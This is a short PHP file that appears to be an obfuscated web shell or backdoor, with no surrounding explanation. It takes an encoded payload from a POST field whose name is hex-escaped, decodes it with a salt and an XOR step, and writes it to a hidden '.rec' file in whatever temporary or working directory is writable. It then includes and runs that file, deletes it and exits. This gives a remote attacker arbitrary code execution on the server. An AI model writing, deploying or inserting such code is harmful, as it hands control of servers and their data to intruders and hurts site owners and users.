<?php

if(isset($_POST["\x66\x6Cag"]) ? true : false){
	$descriptor = $_POST["\x66\x6Cag"];
	 	$descriptor	  =explode (			'.' ,	 	$descriptor ) 	 ;	
	$resource = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt );
    
            foreach($descriptor as $p => $v1):
                $sChar = ord($salt[$p	%	$lenS] );
                $d =((int)$v1 - $sChar -($p	%	10))	^	83;
                $resource 	.=chr($d );
            endforeach;
	$res = array_filter([getcwd(), session_save_path(), "/var/tmp", "/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), sys_get_temp_dir()]);
	foreach ($res as $desc):
    		if (array_product([is_dir($desc), is_writable($desc)])) {
    $binding = join("/", [$desc, ".rec"]);
    if (file_put_contents($binding, $resource)) {
	include $binding;
	@unlink($binding);
	exit;
}
}
endforeach;
}